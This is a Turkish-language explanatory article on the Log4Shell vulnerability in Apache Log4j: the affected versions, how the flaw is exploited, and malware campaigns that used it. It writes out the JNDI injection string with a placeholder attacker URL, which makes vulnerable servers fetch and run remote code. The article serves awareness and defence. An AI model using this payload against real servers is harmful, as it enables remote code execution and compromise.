Log4Shell Vulnerability

10 Aralık 2021'de, Apache Log4j Java tabanlı günlük kaydı platformundaki kritik bir güvenlik açığı için bir istismar yayınlandıhalka açık. CVE-2021-44228 veya Log4Shell olarak izlenen güvenlik açığı, Log4j 2.0-beta9'dan 2.14.1'e kadar olan Log4j sürümlerini etkiler. Tehdit aktörleri, kimliği doğrulanmamış uzaktan erişim sağlamak, kod yürütmek, kötü amaçlı yazılım tehditleri göndermek veya bilgi toplamak için istismardan yararlanabilir. Log4j, kurumsal uygulamalar ve bulut hizmetleri tarafından yaygın olarak kullanıldığından, güvenlik açığı kritik bir duruma atanır.

Log4Shell Teknik Detaylar

Kötüye kullanım, tehdit aktörünün Web tarayıcısının kullanıcı aracısını değiştirmesiyle başlar. Ardından, bir siteyi ziyaret eder veya web sitelerinde bulunan belirli bir dizeyi şu biçimde ararlar:

${jndi:ldap://[saldırgan_URL]}

Sonuç olarak, dize Web sunucusunun erişim günlüklerine eklenecektir. Saldırganlar daha sonra Log4j uygulamasının bu günlükleri ayrıştırmasını ve eklenen dizeye ulaşmasını bekler. Bu durumda, hata tetiklenecek ve sunucunun JNDI dizesinde bulunan URL'yi geri aramasına neden olacaktır. Bu URL, Base64 ile kodlanmış komutları veya Java sınıflarını işlemek için kötüye kullanılıyordaha sonra ve bunları güvenliği ihlal edilmiş cihazda yürütün.

Apache, istismarı ele almak ve düzeltmek için hızla yeni bir sürüm olan Log4j 2.15.0'ı yayınladı, ancak önemli miktarda güvenlik açığı bulunan sistem uzun süre yamasız kalabilir. Aynı zamanda, tehdit aktörleri Log4Shell sıfırıncı gün güvenlik açığını hızla fark etti ve istismar için uygun sunucuları taramaya başladı. Infosec topluluğu, çok çeşitli kötü amaçlı yazılım tehditleri sunmak için Log4Shell kullanan çok sayıda saldırı kampanyasını izledi.

Log4Shell Cryptominer, Botnet, Backdoor ve Veri Toplama Saldırılarında Kullanılıyor

Log4Shell'i operasyonlarında uygulayan ilk tehdit aktörlerinden biri, Kinsing kripto madenciliği botnetinin arkasındaki siber suçlulardı. Bilgisayar korsanları, Base64 ile kodlanmış yükleri teslim etmek ve kabuk komut dosyalarını çalıştırmak için Log4Shell'i kullandı. Bu komut dosyalarının rolü, kendi Kinsing kötü amaçlı yazılımları yürütülmeden önce hedeflenen sistemi rakip kripto madenciliği tehditlerinden temizlemektir.

Netlab 360, ihlal edilen cihazlara Mirai ve Muhstik botnetlerinin sürümlerini yüklemek için güvenlik açığını kullanan tehdit aktörleri tespit etti. Bu kötü amaçlı yazılım tehditleri, saldırganların daha sonra DDoS (Dağıtılmış Hizmet Reddi) saldırıları başlatması veya kripto madencileri dağıtması için talimat verebileceği bir IoT cihazları ve sunucuları ağına virüs bulaşmış sistemleri eklemek için tasarlanmıştır.daha sonra.

Microsoft Tehdit İstihbarat Merkezi'ne göre, Log4j istismarı, Kobalt Strike işaretlerini düşüren saldırı kampanyaları tarafından da hedef alındı. Cobalt Strike, bir şirketin güvenlik sistemlerine karşı sızma testi için kullanılan meşru bir yazılım aracıdır.Bununla birlikte, arka kapı yetenekleri, onu sayısız tehdit aktörü grubunun cephaneliğinin ortak bir parçası haline getirdi. Ardından, kurbanın ağına yasadışı arka kapı erişimi, fidye yazılımı, bilgi hırsızları ve diğer kötü amaçlı yazılım tehditleri gibi sonraki aşama yüklerini sağlamak için kullanılır.

Log4Shell, sunucu verilerini içeren ortam değişkenlerini elde etmek için kullanılabilir. Bu şekilde, saldırganlar ana bilgisayarın adına, işletim sistemi adına, işletim sistemi sürüm numarasına, Log4j hizmetinin çalıştığı kullanıcı adına ve daha fazlasına erişebilir.